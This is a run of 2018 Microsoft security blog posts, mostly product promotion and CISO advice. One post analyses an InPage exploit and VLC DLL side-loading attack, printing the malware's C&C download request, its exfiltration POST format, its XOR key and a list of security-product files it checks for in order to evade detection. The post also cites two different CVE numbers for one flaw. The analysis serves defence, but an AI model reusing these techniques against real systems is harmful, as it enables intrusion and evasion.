Threat signal sharing across services through the Intelligent Security Graph ensures that threat remediation is orchestrated across Microsoft Threat Protection. In this case, Office 365 ATP blocked the related email and malicious document used in the initial stages of the attack. Office 365 ATP had determined the malicious nature of the emails and attachment at the onset, stopping the attacks entry point and protecting Office 365 ATP customers from the attack.

This threat signal is shared with Windows Defender ATP, adding to the rich threat intelligence that was used for investigation. Likewise, Office 365 ATP consumes intelligence from Windows Defender ATP, helping make sure that malicious attachments are detected and related emails are blocked.

Meanwhile, as mentioned, the integration of Windows Defender ATP and Azure Active Directory ensured that affected devices are not allowed to access sensitive corporate data until the threat is resolved.
Windows Defender ATP, Office 365 ATP, and Azure Active Directory are just three of the many Microsoft services now integrate through Microsoft Threat Protection, an integrated solution for securing identities, endpoints, user data, cloud apps, and infrastructure.


The new device risk calculation mechanism in Windows Defender ATP raised the priority of various alerts that turned out to be related to a targeted attack, exposing the threat and allowing security operations teams to immediately take remediation actions. Additionally, the elevated device risk score triggered automated investigation and response, mitigating the attack at its early stages.

Through Conditional access, compromised machines are blocked from accessing critical corporate assets. This protects organizations from the serious risk of attackers leveraging compromised devices to perform cyberespionage and other types of attacks.

To test how these and other advanced capabilities in Windows Defender ATP can help your organization detect, investigate, and respond to attacks, sign up for a free trial.



Hadar Feldman and Yarden Albeck
Windows Defender ATP team



Indicators of attack (IoCs)

Command and control IP addresses and URLs:

  • 199[.]192[.]23[.]231
  • 45[.]122[.]138 [.]6
  • lovehaytyuio09[.]om

Files (SHA-256):

  • 9adfc863501b4c502fdac0d97e654541c7355316f1d1663b26a9aaa5b5e722d6 (size: 190696 bytes, type: PE)
  • 5589544be7f826df87f69a84abf478474b6eef79b48b914545136290fee840fe (size: 727552, type: PE)
  • 073884caf7df8dafc225567f9065bbf9bf8e5beef923655d45fe5b63c6b6018c (size: 195123 bytes, type: docx)
  • 1aef46dcbf9f0b5ff548f492685d488c7ac514a24e63a4d3ed119bfdbd39c908 (size: 207444, type: docx)




Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.


The post Windows Defender ATP device risk score exposes new cyberattack, drives Conditional access to protect networks appeared first on Microsoft Secure.

Categories: cybersecurity Tags:

How to help maintain security compliance

November 26th, 2018 No comments

This is the last post in our eight-blog series on deploying Intelligent Security scenarios. To read the previous entries, check out the Deployment series page.

Image taken at the Microsoft Ignite Conference.

Your employees need to access, generate, and share organizational information ranging from extremely confidential to informal; you must ensure that all information and the movement of that information comply with industry standards without inhibiting workflow. Microsoft 365 security solutions can help you know whats happening with your data, set permissions and classifications, and discover and help prevent leaks.

How can I make it easier to manage compliance processes?

To better manage compliance processes, the first thing youll want to do is distribute the work out to compliance specialists across your organization. The Microsoft 365 Security & Compliance Center (Figure 1) makes this easy by providing a central location to assign people to specific compliance tasks, such as data loss prevention, eDiscovery, and data governance.

Figure 1: The Microsoft 365 Security & Compliance Center Dashboard.

Next, youll need to decide on your policies and data classifications that will allow you to take actions on data. To streamline this compliance task, Microsoft Advanced Data Governance offers automatic data classification and proactive policy recommendationssuch as retention and deletion policiesthroughout the data lifecycle. You can enable default system alerts to identify data governance risks, for example, detecting an employee deleting a large volume of files. You can also create custom alerts by specifying alert-matching conditions, thresholds, or other activities that require admin attention.

How do I assess data protection controls in an ever-changing compliance landscape?

The Microsoft Security Compliance Manager (Figure 2) provides tools to proactively manage evolving data privacy regulations. You can perform ongoing risk assessments on security, compliance, and privacy controls across 11 assessments, including these standards:

  • ISO 27001
  • ISO 27018
  • NIST 800-53

Plus, regional standards and regulations, including:

  • GDPR

As well as industry standards and regulations, such as:

  • NIST 800-171
  • FedRAMP Moderate
  • FedRAMP High

Additionally, the Compliance Manager provides you with step-by-step guidance of how to implement controls to enhance your compliance posture and keep you updated with the current compliance landscape. In addition, built-in collaboration tools to help you assign, track, and record compliance activities to prepare for internal or external audits.

Figure 2: Compliance Manager provides tools to proactively manage evolving data privacy regulations.

How can I protect my data no matter where it lives or travels?

With employees, partners, and other users sharing your data over cloud services, mobile devices, and apps, you need solutions that understand what data is sensitive and automatically protect and govern that data. The unified labeling experience for Microsoft 365 in the Security & Compliance Center provides a tool that allows you to configure data sensitivity labels and protection policies across Azure Information Protection and Office 365 in one location (Figure 3). You can create and customize labels that define the sensitivity of the datafor example, a label of General means the file doesnt contain sensitive information, while Highly Confidential means the file contains very sensitive information. For each label, you can configure protection settings, such as adding encryption and access restrictions, or adding visual markings such as watermarks or headers/footers. To support data governance compliance, you can set policies for data retention, deletion, and disposition, and then automatically apply or publish these labels to users.

Figure 3: Configure data sensitivity labels and protection policies across Azure Information Protection and Office 365 in one location.

There are over 85 built-in sensitive information types that you can use to automatically detect common sensitive data types that may be subject to compliance requirements, such as credit card information, bank account information, passport IDs, and other personal data types. You can also create your own custom sensitive information types (such as employee ID numbers) or upload your own dictionary of terms that you want to automatically detect in documents and emails.

How can I help protect privileged accounts from compromise?

Controlling privileged access can reduce the risk of data compromise and help meet compliance obligations regarding access to sensitive data. Privileged access management (PAM) in Office 365 (Figure 4), available in the Microsoft 365 Admin Center, allows you to enforce zero standing access for your privileged administrative accounts. Zero standing access means users dont have privileges by default. When permissions are provided, its at the bare minimum with just enough access to perform the specific task. Users who need to perform a high-risk task must request permissions for access, and once received all activities are logged and auditable. Its the same principle that defines how Microsoft gives access to its datacenters and reduces the likelihood that a bad actor can gain access to your privileged accounts.

Figure 4: Privileged access management allows you to enforce zero standing access for your privileged administrative accounts.

Plan for success with Microsoft FastTrack. FastTrack comes with your subscription at no additional charge. Whether youre planning your initial rollout, needing to onboard your product, or driving user adoption, FastTrack is your benefit service that is ready to assist you. Get started with FastTrack for Microsoft 365.

Want to learn more?

For more information and guidance on this topic, check out the white paper Maintain compliance with controls and visibility that adhere to global standards. You can find additional security resources on

Coming Soon! Stay tuned for our new series: Top 10 actions you can take with Microsoft 365 Security.

More blog posts from the deploying intelligent security scenario series:

Other blog posts from the security deployment series:

The post How to help maintain security compliance appeared first on Microsoft Secure.

Categories: cybersecurity Tags:

What’s new in Windows Defender ATP

November 15th, 2018 No comments

Across Windows Defender Advanced Threat Protection (Windows Defender ATP) engineering and research teams, innovation drives our mission to protect devices in the modern workplace. Our goal is to equip security teams with the tools and insights to protect, detect, investigate, and automatically respond to attacks. We continue to be inspired by feedback from customers and partners, who share with us the day-to-day realities of security operations teams constantly keeping up with the onslaught of threats.

Today Im excited to share with you some of the latest significant enhancements to Windows Defender ATP. We added new capabilities to each of the pillars of Windows Defender ATPs unified endpoint protection platform: improved attack surface reduction, better-than-ever next-gen protection, more powerful post-breach detection and response, enhanced automation capabilities, more security insights, and expanded threat hunting. These enhancements boost Windows Defender ATP and accrue to the broader Microsoft Threat Protection, an integrated solution for securing identities, endpoints, cloud apps, and infrastructure.

Lets look now at some of the new enhancements to Windows Defender ATP:

New attack surface reduction rules

Attack surface reduction forms the backbone of our answer to a host intrusion and prevention system (HIPS). Attack surface reduction protects devices directly, by controlling and limiting the ways in which threats can operate on a device. Today we are announcing two new rules:

  • Block Office communication applications from creating child processes
  • Block Adobe Reader from creating child processes

These new rules allow enterprises to prevent child processes from being created from Office communication apps (including Outlook) and from Adobe Reader, right at the workstation level. These help eliminate many types of attacks, especially those using macro and vulnerability exploits. We have also added improved customization for exclusions and allow lists, which can work for folders and even individual files.

Emergency security intelligence updates

Emergency security intelligence updates are new, super-fast delivery method for protection knowledge. In the event of an outbreak, Windows Defender ATP research team can now issue an emergency request to all cloud-connected enterprise machines to immediately pull dedicated intelligence updates directly from the Windows Defender ATP cloud. This reduces the need for security admins to take action or wait for internal client update infrastructure to catch up, which often takes hours or even longer, depending on configuration. Theres no special configuration for this other than ensuring cloud-delivered protection is enabled on devices.

Top scores in independent industry tests

Machine learning and artificial intelligence drive our WDATP solution to block 5 billion threats every month and to consistently achieve top scores in independent industry tests: perfect scores in protection, usability, and performance test modules in the latest evaluation by AV-TEST; 99.8% protection rate in the latest real-world test by AV-Comparatives; and AAA accuracy rating in the latest SE Labs test.

We have added dedicated detections for cryptocurrency mining malware (coin miners) which have increasingly become a problem, even for enterprises. We have also increased our focus on detecting and disrupting tech support scams while they are happening.

Protecting our security subsystems using sandboxing

Weve also continued to invest in hardening our platform to make it harder for malicious actors to exploit vulnerabilities and bypass the operating systems built-in security features. Weve done this by putting Windows Defender ATPs antivirus in a dedicated sandbox. Sandboxing makes it significantly more difficult for an attacker to tamper with and exploit the antivirus solution as a means to compromise the device itself.

Evolving from individual alerts to Incidents

We are introducing Incidents, an aggregated view that helps security analysts to understand the bigger context of a complex security event. As attacks become more sophisticated, security analysts face the challenge of reconstructing the story of an attack. This includes identifying all related alerts and artifacts across all impacted machines and then correlating all of these across the entire timeline of an attack.

With Incidents, related alerts are grouped together, along with machines involved and the corresponding automated investigations, presenting all collected evidences and showing the end-to-end breadth and scope of an attack. By transforming the queue from hundreds of individual alerts to a more manageable number of meaningful aggregations, Incidents eliminate the need to review alerts sequentially and to manually correlated malicious events across the organization, saving up to 80% of analyst time.

The Incident graph view shows you the relations between the entities, with additional details in the side pane when click on an item.

Automating response for fileless attacks

We expanded automation in Windows Defender ATP to automatically investigate and remediate memory-based attacks, also known as fileless threats. We see more and more of these memory-based threats, and while weve had the optics to detect them, security analysts needed special investigation skills to solve them. Windows Defender ATP can now leverage automated memory forensics to incriminate memory regions and perform required in-memory remediation actions.

With this new unique capability, we are shifting from simply alerting to a fully automated investigation and resolution flow for memory-based attacks. This increases the range of threats addressable by automation and further reduces the load on security teams.

Process injection automatically investigated and remediated

Threat analytics

Threat analytics is a set of interactive threat intelligence reports published by our research team as soon as emerging threats and outbreaks are identified. The Threat analytics dashboard provides technical description and data about a threat, and answer the key question, Does WDATP detect this threat?. It also provides recommended actions to contain and prevent specific threats, as well as increase organizational resilience.

But we dont stop there. We also provide an assessment of the impact of threats on your environment (Am I hit?), as well as show a view of how many machines were protected (Were you able to stop this?) and how may are exposed to the threat because they are not up-to-date or are misconfigured (Am I exposed?).

Threat analytics dashboard

Custom detection rules

With Advanced hunting, security analysts love the power they now have to hunt for possible threats across their organization using flexible queries. A growing community of security researchers share their queries with others using the GitHub community repository. These queries can now also be used as custom detection rules, which means that these queries will automatically create and raise an alert when a scheduled query returns a result.

Creating custom detection rules from advance hunting queries

Integration with Microsoft Information Protection

Windows Defender ATP now provides built-in capabilities for discovery and protection of sensitive data on enterprise endpoints. We have integrated with Azure Information Protection (AIP) Data Discovery, providing visibility to labeled files stored on endpoints. AIP dashboard and log analytics will include files discovered on Windows devices alongside device risk info from Windows Defender ATP, allowing customers to discover sensitive data at risk on Windows endpoints.

Windows Defender ATP can also automatically protect sensitive files based on their label. Through Office Security and Compliance (SCC) policy, Windows Defender ATP automatically enables Windows Information Protection (WIP) for files with labels that correspond to Office SCC policy.

Integration with Microsoft Cloud App Security

Windows Defender ATP uniquely integrates with Microsoft Cloud App Security to enhance the discovery of shadow IT in an organization as seen from enterprise endpoints. Windows Defender ATP provides a simplified rollout of Cloud App Security discovery as it feeds Cloud App Security with endpoints signals, reducing the need for collecting signals via corporate proxies and allowing seamless collection of signals even when endpoints are outside of the corporate network.

Through this integration, Microsoft Cloud App Security leverages Windows Defender ATP to collect traffic information about client-based and browser-based cloud apps and services being accessed from IT-managed Windows 10 devices. This seamless integration does not require any additional deployment and gives admins a more complete view of the usage of cloud apps and services in their organization.

Innovations that work for you today and the future

These new features in Windows Defender Advanced Threat Protection unified security platform combine the world-class expertise inside Microsoft and the insightful feedback from you, our customers, who we built these solutions for. We ask that you continue to engage and partner with us as we continue to evolve Windows Defender ATP.

You can test all new and existing features by signing up to a free 60-day fully featured Windows Defender ATP trial. You can also test drive attack surface reduction and next-gen protection capabilities using the Windows Defender demo page or run DIY simulations for features like Incidents, automated investigation and response, and others directly from the Windows Defender security center portal to see how these capabilities help your organization in real-world scenarios.

Meanwhile, the work to stay ahead of threats doesnt stop. You can count on the Windows Defender ATP team to continue innovating, learning from our own experiences, and partnering with you to empower you to confidently protect, detect, and respond to advanced attacks.



Moti Gindi
General Manager, Windows Cyber Defense




Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

The post What’s new in Windows Defender ATP appeared first on Microsoft Secure.

Categories: cybersecurity Tags:

CISO series: Lessons learned—4 priorities to achieve the largest security improvements

November 13th, 2018 No comments

In my past life as CISO, Ive worked for small companies, state governments, and large enterprises, and one thing that has been true at all of them is that there is an infinite number of security initiatives in each organization you could implement, yet the resources to accomplish those tasks are finite. To be an effective CISO, I had to learn to appropriate the resources under my control toward the solutions that confront the greatest risk to the most valuable parts of the business. I also had to learn how to extend my own resource pool by persuading every individual at the company that they had a role to play in protecting the organization. In short, I learned to aggressively prioritize resources, quantify risk, and influence others.

In this blog, Ill share the methods Ive used to prioritize where and how I spend my resources. There really are just four priorities to achieve the largest security improvements:

  1. Identify what is under your control.
  2. Formulate a security strategy.
  3. Implement good cybersecurity hygiene.
  4. Disrupt the cyber kill chain.

Identify the business you are charged with protecting

Before you can begin to allocate your resources, you first need to identify what is under your control. What are the capital and operating budgets available for security, and who are the people responsible for security? You may manage security professionals both inside and outside the company, and you need to know who they are and their strengths and weaknesses. When it comes time to assign people and budgets to your priorities, this knowledge will prove crucial.

You must also know the business. Get clear about which products, services, and lines of business are the biggest drivers of the organizations success. Once you understand what drives the business and the resources you control, you will need to formulate a strategy.

Formulate a security strategy

Understanding the most critical business drivers will help you formulate a security strategy,which Ive written about in more detailin a previous post. When you have your security strategy, youre ready to establish a strong cybersecurity hygiene.

Implement good cybersecurity hygiene

One example of how Ive prioritized security initiatives as a CISO comes from my time at the State of Colorado. When I first stepped into the CISO role in Colorado state government, I needed to modernize their security approach and address vulnerabilities across the enterprise with a very limited budget. I wanted to show results quickly, so I chose to focus on the small things that could be implemented easily and would drive the greatest reduction in risk.

This approachoften referred to as cybersecurity hygieneconcentrates on hardening systems by leveraging secure configurations, putting in place processes and tools to ensure data, devices, and the network are protected against vulnerabilities, and maintaining the patch levels of critical systems

Before you move on to more complex initiatives, be sure youve walked through each of the following steps:

Inventory your network: The first step is to identify every inch of your network, because you cant protect what you cant see. You must know what type of equipment is on your network and whether it is part of internal networks, hosted on the internet, or part of a cloud platform. Once you know what you have, you need to maintain a continuously updated inventory of the hardware and software thats authorized to be on your network.

Scan and patch: When youve identified all the devices and applications on your network, you should scan them from a central point on a regular basis and patch and deactivate themremotelyas necessary. For larger organizations, the scale of this operation is the challenge, especially with limited maintenance windows, a proliferation of web apps and devices, and architectural complexities. Flexible and scalable security scanning services are therefore becoming increasingly necessary.

Continuously look for vulnerabilities: The frequency and complexity of attacks continue to increase, so it is no longer an option to scan your network on a semi-regular basis. You should try to constantly monitor for threats, and quickly address them within your network.

To help you with this process, you can read more details on cybersecurity hygiene. You should also leverage the cloud as it helps you to quickly modernize and sunset legacy and vulnerable systems, provides more automation, and allows you to inherit and extend your security team by gaining from the expertise of the cloud security provider.

Once your systems are hardened and you have a process and tools to continuously monitor your network, you should next focus on interrupting the most common methods hackers use to enter your network, what we refer to as the cyber kill chain.

Understand and disrupt the cyber kill chain

The kill chain is a workflow that cybercriminals deploy to infiltrate a company. Attackers of all sizes have had great success with this approach, so it is worth understanding and then implementing solutions to circumvent it.

External recon: Most hackers begin their attack by gathering intelligence on your company. They collect data on employees, executives, technologies, and supply chain to increase the odds of a successful attack.

Solution: Enable Multi-Factor Authentication to require that users sign in with two forms of verification, reducing the likelihood that theyll be compromised.

Compromised machine: At this stage, the attacker targets a carefully selected employee with a phishing campaign. This campaign is designed to trick the user into executing an attachment or visiting a site that will install a backdoor on the employees computer, giving them the ability to control the computer.

Solution: Implement Office 365 Advanced Threat Protection to protect against malicious files.

Internal recon: Once an attacker has compromised a machine, theyll begin to gather intelligence that is newly available, such as credentials stored locally on the machine. Theyll also map internal networks and systems. This new information will allow them to plan their next move.

Solution: Use Windows 10s security features designed to both stop the initial infection and, if infected, prevent further lateral movement.

Domain dominance: The attacker will try to elevate their access within the network to gain access to a privileged account and your company data.

Solution: Use Microsoft Advanced Threat Analytics to provide a robust set of capabilities to detect this stage of an attack.

Data consolidation and exfiltration: If an attacker gains access to your data, the final step would be to package it up and move it out of the organization without detection, in a process called “data consolidation and exfiltration.” Paying close attention to the first phases of an attack will hopefully prevent an attacker from getting this far.

Focus on what matters most to the business

Even the largest enterprise is faced with tough choices when allocating security resources. If you are smart about how you appropriate them, you can make choices that have the greatest chance of protecting your organization. It starts with understanding your current state, both your resources and the most critical business drivers, formulating a solid strategy, implementing good cybersecurity maintenance, and finally, disrupting the cybersecurity kill chain.

In the coming weeks, I will share lessons Ive learned to evaluate risks quantitatively. And following this, I will talk about how Ive learned to influence others to take their role in protecting the organization very seriously.

To read more blogs from the series, visit the CISO series page.

The post CISO series: Lessons learned—4 priorities to achieve the largest security improvements appeared first on Microsoft Secure.

Categories: cybersecurity Tags:

Attack uses malicious InPage document and outdated VLC media player to give attackers backdoor access to targets

November 8th, 2018 No comments

Our analysis of a targeted attack that used a language-specific word processor shows why its important to understand and protect against small-scale and localized attacks as well as broad-scale malware campaigns. The attack exploited a vulnerability in InPage, a word processor software for specific languages like Urdu, Persian, Pashto, and Arabic.

More than 75% of the targets were located in Pakistan; however, the attack also found its way into some countries in Europe and the US. The targets included government institutions.

Figure 1. Geographic distribution of targets

In the past, researchers at Palo Alto and Kaspersky have blogged about attacks that use malicious InPage documents. Beyond that, public research of these types of attacks has been limited.

The Office 365 Research and Response team discovered this type of targeted attack in June. The attack was orchestrated using the following approach:

  • Spear-phishing email with a malicious InPage document with the file name hafeez saeed speech on 22nd April.inp was sent to the intended victims
  • The malicious document, which contained exploit code for CVE-2017-12824, a buffer-overflow vulnerability in InPage reader, dropped a legitimate but outdated version of VLC media player that is vulnerable to DLL hijacking
  • The side-loaded malicious DLL called back to a command-and-control (C&C) site, which triggered the download and execution of the final malware encoded in a JPEG file format
  • The final malware allowed attackers to remotely execute arbitrary command on the compromised machine

Figure 2. Attack infection chain

Office 365 Advanced Threat Protection (ATP) protects customers from this attack by detecting the malicious InPage attachment in spear-phishing emails used in the campaign. Office 365 ATP inspects email attachments and links for malicious content and provides real-time protection against attacks.

Office 365 ATP leverages massive threat intelligence from different data sources and integrates signals from multiple services such as Windows Defender ATP and Azure ATP. For example, Windows Defender Antivirus detects the malicious files and documents used in this attack. Additionally, endpoint detection and response (EDR) capabilities in Windows Defender ATP detects the DLL side-loading and malicious behavior observed in this attack. Through the integration of Office 365 ATP and the rest of Microsoft security technologies in Microsoft Threat Protection, detection and remediation are orchestrated across our solutions.

Entry point: Malicious InPage document

An email with a malicious InPage lure document attached was sent to select targets. The document exploits CVE-2017-12842, a vulnerability in InPage that allows arbitrary code execution. When the malicious InPage document is opened, it executes a shellcode that decrypts and executes an embedded malicious DLL file. The decryption routine is a simple XOR function that uses the decryption key “27729984h”.

Figure 3. First DLL decryption function

Stage 1: DLL side-loading and C&C communication

The decrypted malicious DLL contains two files embedded in the PE resources section. The first resource file is named 200, which is a legitimate version of VLC media player (Product Version:, File Version: 2.2.1). The second file in the resources section is named 400, which is a DLL hijacker that impersonates the legitimate file Libvlc.dll.

When run, the stage 1 malware drops both the VLC media player executable and the malicious Libvlc.dll in %TEMP% folder, and then runs the VLC media player process.

The vulnerable VLC media player process searches for the dropped file Libvlc.dll in the directory from which it was loaded. It subsequently picks up and loads the malicious DLL and executes its malicious function.

Figure 4. Functions exported by the malicious Libvlc.dllFigure 5. Functions imported from Libvlc.dll by the VLC media player process

The most interesting malicious code in Libvlc.dll is in the function libvlc_wait(). The malicious code dynamically resolves the API calls to connect to the attacker C&C server and download a JPEG file. If the C&C server is not reachable, the malware calls the API sleep() for five seconds and attempts to call back the attacker domain again.

Figure 6. C&C callback in malicious function libvlc_wait()

If the JPEG file, logo.jpg, is successfully downloaded, the malicious code in libvlc_wait() skips the first 20 bytes of the JPEG file and creates a thread to execute the embedded payload. The code in JPEG file is encoded using Shikata ga nai, a custom polymorphic shellcode encoder/decoder.

Below an example of HTTP request sent to the C&C to download the malicious file logo.jpg.

GET /assets/vnc/logo.jpg HTTP/1.1
Accept: */*

HTTP/1.1 200 OK
Date: Mon, 09 Jul 2018 13:45:49 GMT
Server: Apache/2.4.33 (cPanel) OpenSSL/1.0.2o mod_bwlimited/1.4 Phusion_Passenger/5.1.12
Upgrade: h2,h2c
Connection: Upgrade
Last-Modified: Mon, 09 Apr 2018 07:19:20 GMT
ETag: "26e0378-2086b-56965397b5c31"
Accept-Ranges: bytes
Content-Length: 133227
Content-Type: image/jpeg

Figure 7. HTTP GET Request embedded in the JPEG File

The historical Whois record indicated that the C&C server was registered on March 20, 2018.

Domain Name:
Registry Domain ID: D2169366F46A14BCD9EB42AF48BEA813C-NSR
Registrar WHOIS Server:
Registrar URL:
Updated Date: 2018-03-20T14:04:40Z
Creation Date: 2018-03-20T14:04:40Z
Registry Expiry Date: 2019-03-20T14:04:40Z
Domain Status: clientTransferProhibited
Domain Status: addPeriod

Figure 8. Whois record for the attacker C&C server.

The shellcode in the JPEG file uses multiple layers of polymorphic XOR routines to decrypt the final payload. After successfully decrypting the payload, it drops and executes the final DLL malware aflup64.dll in the folder %ProgramData%\Dell64.

Figure 9. The first 29 Bytes of the JPEG file after the header make up the first decryption layer

Figure 10. Valid JPEG file header followed by encrypted malicious code

Stage 2: System reconnaissance and executing attacker commands

The final stage malware maintains persistence using different methods. For example, the malicious function IntRun() can load and execute the malware DLL. It also uses the registry key CurrentVersion\Run to maintain persistence.

The malwares capabilities include:

  • System reconnaissance

    • List computer names, Windows version, Machine ID, running processes, and loaded modules
    • List system files and directories
    • List network configuration

  • Execute attacker commands
  • Evade certain sandboxes or antivirus products

Collected information or responses to commands are sent back to the attacker domain via an HTTP post request. The request has a custom header that always starts with 37 hardcoded alphanumeric characters.

Content-Disposition: form-data; name="id";
Content-Type: text/plain
<Base64 Data Blob>

Figure 11. Sample of malware POST request

The malware also has a list of hardcoded file names of security products and sandbox solutions. If these files are present in a machine the malware attempts to infect, it exists:

  • avgnt.exe
  • avp.exe
  • egui.exe
  • Sbie.dll
  • VxKernelSvcNT.log

Detecting targeted attacks with Office 365 ATP and Windows Defender ATP

Historically, malware payloads like the stage 2 malware in this attack are used to steal credentials and other sensitive information, install more payloads, or move laterally in the network. However, because the malware opens a backdoor channel for remote attackers to execute arbitrary commands of their choice, theres a wide range of possibilities.

Enterprises can protect themselves from targeted attacks using Office 365 Advanced Threat Protection, which blocks threats based on the detection of malicious behaviors. Office 365 ATP helps secure mailboxes against email attacks by blocking emails with unsafe attachments, malicious links, and linked-to files leveraging sandboxing and time-of-click protection. Recent enhancements in anti-phishing capabilities in Office 365 address impersonation, spoof, phishing content, and internal phishing emails sent from compromised accounts. If you are not already secured against advanced cyberthreat campaigns via email, begin a free Office 365 E5 trial today.

In addition, enterprises can use Windows Defender Advanced Threat Protection, which provides a unified endpoint security platform for intelligent protection, detection, investigation, and response. Exploit protection, attack surface reduction rules, hardware-based isolation, controlled folder access, and network protection reduce the attack surface. Windows Defender Antivirus detects and blocks the malicious documents and files used in this campaign. Windows Defender ATPs endpoint detection and response, automated investigation and remediation, and advanced hunting capabilities empower security operations personnel to detect and stop attacks in enterprise networks. To test how Windows Defender ATP can help your organization detect, investigate, and respond to advanced attacks, sign up for a free Windows Defender ATP trial.

These two services integrate with the rest of Microsofts security technologies as part of the Microsoft Threat Protection, an integrated solution providing security for the modern workplace across identities, endpoints, user data, cloud apps, and infrastructure. Cybersecurity is the central challenge of our digital age, and Microsoft doesnt stop innovating to provide industry-best integrated security. For more information, read the blog post Delivering security innovation that puts Microsofts experience to work for you.




Ahmed Shosha and Abhijeet Hatekar
Microsoft Threat Intelligence Center




Indictors of Compromise (IoCs)


Files (SHA-256)
013417bd5465d6362cd43c70015c7a74a1b8979785b842b7cfa543cb85985852 (INP File)
9ffb61f1360595fc707053620f3751cb76c83e67835a915ccd3cbff13cf97bed (EXE)
019b8a0d3f9c9c07103f82599294688b927fbbbdec7f55d853106e52cf492c2b (DLL)

The post Attack uses malicious InPage document and outdated VLC media player to give attackers backdoor access to targets appeared first on Microsoft Secure.

CISO series: Build in security from the ground up with Azure enterprise

November 1st, 2018 No comments

As an executive security advisor at Microsoft and a former CISO, I meet with other CISOs every week to discuss cybersecurity, cloud architecture, and sometimes everything under the sun regarding technology. During these discussions with CISOs and other senior security executives of large enterpriseswho are in the beginning stages of a cloud migrationI find theyre excited about the increased flexibility of Microsoft Azure services and the consumption-based model it offers their business units. Regardless of where they are in the journey, they also have some concerns. For example, they need to figure out how to enforce security policies when IT no longer serves as the hub for services and applications.

Specifically, they come to me with the following three questions:

  1. We are interested in Microsoft and already have many of your security solutions. How do these tools translate to a hybrid-cloud solution and where do we start?
  2. Security impacts many parts of the organization outside of the security team. Who do we need to bring to the table across the organization for this to be a successful migration to a secure cloud?
  3. Can we create a roadmap or strategy to guide our journey to the cloud?

It really comes down to balancing agility with governance. Many of my customers have found that the Azure enterprise scaffold and Azure Blueprints (now in preview) can help them balance these two critical priorities. I hope my suggestions and insight help you to understand how to use these tools to smooth your cloud migration.

Establish a flexible hierarchy as the baseline for governance

Scaffolding and blueprints are concepts borrowed from the construction industry. When a construction crew builds a large, complex, and time-consuming project they refer to blueprints and erect scaffolding. Together these tools simplify the process and provide guardrails to guide the builder. You can think of the Azure enterprise scaffold and Azure Blueprints in the same way.

  • Scaffolding is a flexible framework that applies structure and anchors for services and workloads built on Azure. It is a layered process designed to ensure workloads meet the minimum governance requirements of your organization while enabling business groups and developers to quickly meet their own goals.
  • Blueprints are common cloud architecture examples that you can customize for your needs.

Customers find the Azure enterprise scaffold valuable because it can be personalized to the needs of the company for billing, resource management, and resource access. It is grounded in a hierarchy that gives you a structure for subdividing the environment into up to four nested layers to match your organization’s structure:

Enterprise enrollmentThe biggest unit of the hierarchy. Enterprise enrollment defines the specifics of your contracted cloud services.

DepartmentsWithin the enterprise agreement are departments, which can be broken down according to what works best for your organization. Three of the most popular patterns are by function (human resources, information technology, marketing), by business unit (auto, aerospace), and by geography (North America, Europe).

SubscriptionsWithin departments are accounts and then subscriptions. Subscriptions can represent an application, the lifecycle of a service (such as production and non-production), or the departments in your organization.

Resource groupsNested in subscriptions are resource groups, which allow you to put resources into meaningful groups for management, billing, or natural affinity. This hierarchy serves as the foundation for security policies and processes that you will layer on next.

Safeguard your identities and privileged access

When I talk with security executives about implementing security policies, we always start our discussion with identity. You can do the same by identifying who and what systems should have access to what resourcesand how you want to control this access. Once you connect your Azure Active Directory (Azure AD) to your on-premises Active Directory (AD)using the AD Connect toolyou can use role-based access control (RBAC) to assign users to roles, such as owner, contributor, or others that you create. Dont forget to set up Multi-Factor Authentication (MFA) and adhere to the principle of granting the least privilege required to do the work. See Azure identity management best practices for more resources and security tips.

With your hierarchy established and resources assigned, you can use Azure Policy and Initiatives to define policies and apply them to subscriptions.

A couple examples of popular policies include:

  • Restrict specific resources to a geographical region to comply with country or region-specific regulations.
  • Prohibit certain resources, such as servers or data, from being deployed publicly.

Policies are a powerful tool that let you give business units access to the resources they need without exposing the enterprise to additional risk.

You will also need a plan for securing privileged accounts. I recommend creating a privileged access workstation when you start building out your security forest for administrators. Privileged access workstations provide a dedicated operating system for sensitive tasks that separates them from daily workstations and provide additional protection from phishing attacks and other vulnerabilities. With a good identity and access policy in place you have started down the path of trust but verify or building a zero-trust environment.

Gain greater visibility into the security of your entire environment

One big advantage of moving to the cloud is how much more visibility you get into the security of your environment versus on-premises. Azure offers several additional capabilities that allow you to protect your resources and detect threats. TheAzure Security Centerprovides a unified view of the security status of resources across your environment. It includes advanced threat protection that uses artificial intelligence (AI) to detect incoming attacks and sends alerts in a way thats easy to digest. Security DevOps toolkits are a collection of scripts, tools, and automations that allow you to integrate security into native DevOps workflows. Azure update management ensures all your servers are patched with the latest updates.

Get started with Azure Blueprints

Using the scaffolding and blueprints framework can help you establish a secure foundation for your Azure environment by safeguarding identities, resources, networks, and data. Ive touched on a few of the components, and you can dig into the nitty gritty in this article. When youre ready to get started, Azure Blueprintsare available in preview. This capability will allow you to deploy the Azure enterprise scaffold model to your organization. Numerous organizations have used the blueprints and followed the scaffolding approach to successfully roll out their cloud strategy securely and faster than they expected.

As a final note of consideration as you work through your organizations cloud/security strategymake sure you have all the stakeholders in the room. Many times, there are other parts of the organization who own security controls but are outside of the security organization. These might include operations, legal, human resources, information technology, and others. These stakeholders should be brought into the scaffolding and blueprint discussions, so they understand their roles and responsibilities as well as provide input.

If you want to discuss this further or need assistance, please reach out to your Microsoft account team.

The post CISO series: Build in security from the ground up with Azure enterprise appeared first on Microsoft Secure.

Categories: cybersecurity Tags:

How to share content easily and securely

October 31st, 2018 No comments

This is the seventh post in our eight-blog series on deploying Intelligent Security scenarios. To read the previous entries, check out the Deployment series page.

Image taken at the Microsoft Ignite Conference.

Cumbersome restrictions and limitations on mobile devices, apps, and remote access can be taxing from an IT perspective and frustrating for your employees. Your users need to be able to create, access, and share files from anywhere, and IT needs to ensure that these actions wont compromise your companys security.

Microsoft 365 offers security solutions that help secure your collaboration and productivity apps. That way your employees can connect and communicate wherever they are, using tools they are familiar with, as securely as if they were right at their desks.

How can I securely share documents outside my organization?

Classify documents based on content sensitivity

First, classify documents using Azure Information Protection (AIP). With AIP, you can configure policies to classify, label, and protect data based on its sensitivity. Data can be classified according to standards you define for content, context, and source. These classifications can then be applied automatically or manually, or you can prompt your employees to decide what classification to apply with in-product suggestions.

